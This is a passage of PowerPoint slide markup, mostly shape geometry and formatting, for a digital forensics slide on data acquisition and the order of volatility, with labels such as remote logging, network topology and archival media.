              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="80"/>
              </a:spcBef>
            </a:pP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Remote</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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logging</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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monitoring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data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954810" y="6143780"/>
            <a:ext cx="1277620" cy="1289685"/>
            <a:chOff x="5954810" y="6143780"/>
            <a:chExt cx="1277620" cy="1289685"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="object 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5954810" y="6143780"/>
              <a:ext cx="1277620" cy="1289685"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1277620" h="1289684">
                  <a:moveTo>
                    <a:pt x="629933" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="583625" y="2706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538021" y="8693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="493268" y="17865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449513" y="30122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406902" y="45368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365581" y="63506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325697" y="84437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287397" y="108064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250828" y="134289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216135" y="163016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183465" y="194146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152966" y="227581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124783" y="263226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99063" y="300981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75952" y="340749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55598" y="382433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38146" y="425935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23744" y="471158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12538" y="518004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4816" y="565530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669" y="612794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="659649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2710" y="705949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8702" y="751546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17879" y="796295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30142" y="840047"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45394" y="882657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63537" y="923976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84474" y="963860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108105" y="1002160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134335" y="1038729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163064" y="1073422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194196" y="1106090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227632" y="1136588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263274" y="1164768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301026" y="1190484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340789" y="1213588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382465" y="1233935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425958" y="1251376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="471168" y="1265765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="517998" y="1276956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="565539" y="1284694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="612816" y="1288856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="659682" y="1289539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="705990" y="1286840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751593" y="1280858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="796346" y="1271690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840101" y="1259434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="882713" y="1244187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="924033" y="1226048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="963917" y="1205114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002217" y="1181484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1038787" y="1155253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1073480" y="1126522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1106149" y="1095386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1136649" y="1061945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1164832" y="1026295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1190552" y="988534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1213662" y="948761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1234016" y="907073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1251468" y="863567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1265870" y="818343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1277077" y="771496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="644871" y="644750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="771617" y="12544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724075" y="4821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676798" y="672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629933" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="70BC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075062" y="6264161"/>
              <a:ext cx="1049020" cy="1049020"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1049020" h="1049020">
                  <a:moveTo>
                    <a:pt x="533620" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="487318" y="1196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441813" y="6420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397322" y="15527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354062" y="28373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312253" y="44811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272110" y="64697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233852" y="87886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197697" y="114232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163862" y="143590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132565" y="175815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104024" y="210762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78455" y="248286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56078" y="288241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37109" y="330483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21767" y="374866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10269" y="421245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2974" y="468468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="515334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1201" y="561625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6432" y="607124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15547" y="651611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28402" y="694869"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44850" y="736680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64746" y="776826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87945" y="815088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114302" y="851249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143670" y="885091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175905" y="916395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210861" y="944943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248393" y="970518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288355" y="992901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="330601" y="1011874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374988" y="1027220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421368" y="1038719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468590" y="1045995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515452" y="1048955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561739" y="1047743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="607230" y="1042505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="651710" y="1033386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694959" y="1020530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736760" y="1004083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="776895" y="984190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="815147" y="960995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="851298" y="934644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885129" y="905283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="916423" y="873055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="944963" y="838106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="970529" y="800580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="992906" y="760624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1011874" y="718382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1027216" y="673999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1038715" y="627620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1046011" y="580398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1048988" y="533535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1047792" y="487249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1042568" y="441758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1033460" y="397278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1020615" y="354029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004177" y="312228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984290" y="272093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="961102" y="233841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934756" y="197690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905398" y="163859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="873173" y="132565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="838226" y="104025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="800702" y="78458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760746" y="56082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718505" y="37114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674122" y="21771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627743" y="10273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="580501" y="2977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="533620" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="31736C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9298167" y="6143780"/>
            <a:ext cx="1277620" cy="1289685"/>
            <a:chOff x="9298167" y="6143780"/>
            <a:chExt cx="1277620" cy="1289685"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="object 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9298167" y="6143780"/>
              <a:ext cx="1277620" cy="1289685"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1277620" h="1289684">
                  <a:moveTo>
                    <a:pt x="629890" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="583590" y="2706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="537992" y="8693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="493244" y="17865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449492" y="30122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406882" y="45368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365562" y="63506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325679" y="84437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287379" y="108064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250810" y="134289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216117" y="163016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183448" y="194146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152951" y="227581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124770" y="263226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99055" y="300981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75950" y="340749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55604" y="382433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38163" y="425935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23774" y="471158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12583" y="518004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4844" y="565530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="682" y="612794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="659649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2698" y="705949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8679" y="751546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17846" y="796295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30101" y="840047"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45345" y="882657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63482" y="923976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84412" y="963860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108039" y="1002160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134265" y="1038729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162991" y="1073422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194120" y="1106090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227554" y="1136588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263195" y="1164768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300946" y="1190484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340708" y="1213588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382384" y="1233935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425876" y="1251376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="471086" y="1265765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="517916" y="1276956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="565458" y="1284694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="612737" y="1288856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="659606" y="1289539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="705918" y="1286840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751527" y="1280858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="796285" y="1271690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840046" y="1259434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="882663" y="1244187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="923989" y="1226048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="963878" y="1205114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002183" y="1181484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1038756" y="1155253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1073452" y="1126522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1106123" y="1095386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1136623" y="1061945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1164805" y="1026295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1190522" y="988534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1213627" y="948761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1233973" y="907073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1251415" y="863567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1265804" y="818343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1276995" y="771496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="644789" y="644750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="771535" y="12544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724009" y="4821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676745" y="672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629890" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CF5C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9418370" y="6264161"/>
              <a:ext cx="1049020" cy="1049020"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1049020" h="1049020">
                  <a:moveTo>
                    <a:pt x="533620" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="487329" y="1196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441831" y="6420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397344" y="15527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354085" y="28373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312274" y="44811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272129" y="64697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233866" y="87886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197705" y="114232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163864" y="143590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132560" y="175815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104011" y="210762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78437" y="248286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56053" y="288241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37080" y="330483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21735" y="374866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10235" y="421245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2959" y="468468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="515334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1211" y="561625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6449" y="607124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15569" y="651611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28425" y="694869"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44872" y="736680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64765" y="776826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87959" y="815088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114310" y="851249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143672" y="885091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175900" y="916395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210849" y="944943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248374" y="970518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288330" y="992901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="330572" y="1011874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374955" y="1027220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421334" y="1038719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468557" y="1045995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515423" y="1048955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561714" y="1047743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="607211" y="1042505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="651697" y="1033386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694953" y="1020530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736762" y="1004083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="776904" y="984190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="815161" y="960995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="851316" y="934644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885151" y="905283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="916446" y="873055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="944984" y="838106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="970547" y="800580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="992917" y="760624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1011874" y="718382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1027202" y="673999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1038681" y="627620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045977" y="580398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1048955" y="533535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1047759" y="487249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1042534" y="441758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1033427" y="397278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1020581" y="354029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004143" y="312228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984257" y="272093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="961068" y="233841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934722" y="197690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905364" y="163859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="873139" y="132565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="838192" y="104025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="800668" y="78458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760713" y="56082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718471" y="37114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674088" y="21771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627709" y="10273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="580486" y="2977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="533620" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FF88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5159121" y="7729219"/>
            <a:ext cx="2882900" cy="69723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0"/>
              </a:spcBef>
            </a:pP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Physical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configuration </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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12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network</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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topology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107805" y="7704835"/>
            <a:ext cx="194500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Archival</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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media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752089" y="3570859"/>
            <a:ext cx="1847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0" b="1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291198" y="3570859"/>
            <a:ext cx="1847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0" b="1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832593" y="3594861"/>
            <a:ext cx="1847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0" b="1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3353034" y="3601973"/>
            <a:ext cx="1847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0" b="1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515227" y="6608191"/>
            <a:ext cx="1847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0" b="1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845420" y="6584060"/>
            <a:ext cx="1847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0" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>6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23308" y="306451"/>
            <a:ext cx="7007859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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data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100">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Acquisition</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Order</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Volatility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2676" y="760476"/>
            <a:ext cx="10152888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728209" y="1933193"/>
